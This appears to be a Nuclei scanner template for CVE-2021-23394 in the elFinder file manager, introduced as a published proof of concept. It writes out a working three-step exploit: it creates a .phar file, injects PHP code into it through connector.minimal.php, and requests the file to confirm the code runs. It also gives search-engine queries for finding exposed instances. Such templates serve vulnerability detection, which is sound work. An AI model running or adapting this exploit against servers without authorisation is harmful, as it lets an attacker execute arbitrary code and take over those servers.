studio-42/elfinder before 2.1.58 contains a remote code execution caused by execution of PHP code in a .phar file, letting attackers execute arbitrary PHP code if the server parses .phar files as PHP, exploit requires server to parse .phar files as PHP.
PoC代码[已公开]
id: CVE-2021-23394
info:
name: elFinder < 2.1.58 - Remote Code Execution
author: 0xanis
severity: high
description: |
studio-42/elfinder before 2.1.58 contains a remote code execution caused by execution of PHP code in a .phar file, letting attackers execute arbitrary PHP code if the server parses .phar files as PHP, exploit requires server to parse .phar files as PHP.
impact: |
Attackers can execute arbitrary PHP code on the server, potentially leading to full server compromise.
remediation: |
Update to version 2.1.58 or later.
reference:
- https://github.com/Studio-42/elFinder/issues/3295
- https://blog.sonarsource.com/elfinder-the-story-of-a-file-manager-and-a-bunch-of-vulnerabilities
- https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554
- https://nvd.nist.gov/vuln/detail/CVE-2021-23394
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2021-23394
cwe-id: CWE-434
epss-score: 0.70226
epss-percentile: 0.9861
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: std42
product: elfinder
shodan-query: http.title:"elfinder"
fofa-query: title="elfinder"
google-query: intitle:"elfinder"
tags: cve,cve2021,elfinder,rce,phar,file-upload,intrusive,vkev
variables:
filename: "{{randstr}}"
payload_str: "{{randstr}}"
http:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{filename}}.phar HTTP/1.1
Host: {{Hostname}}
Accept: application/json
matchers:
- type: dsl
dsl:
- contains_all(body, 'isowner', 'createext', 'added')
- contains(content_type, 'application/json')
- status_code == 200
condition: and
internal: true
extractors:
- type: json
name: hash
part: body
json:
- ".added[0].hash"
internal: true
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=<?='';+echo+md5('{{payload_str}}');+?> HTTP/1.1
Host: {{Hostname}}
Accept: application/json
matchers:
- type: dsl
dsl:
- contains_all(body, 'isowner', 'phash', 'changed')
- contains(content_type, 'application/json')
- status_code == 200
condition: and
internal: true
- raw:
- |
GET /elFinder/files/{{filename}}.phar HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{md5(payload_str)}}"
# digest: 4b0a0048304602210088546ba4c633fb0b6093b0e2a1e3cffdf6efd3d31086aeaacc6acf3dc80bec0d022100ccf24d371080b7aac95735393ba94a472e8acee58af5654ebe7a98694bae0e45:922c64590222798bb761d5b6d8e72950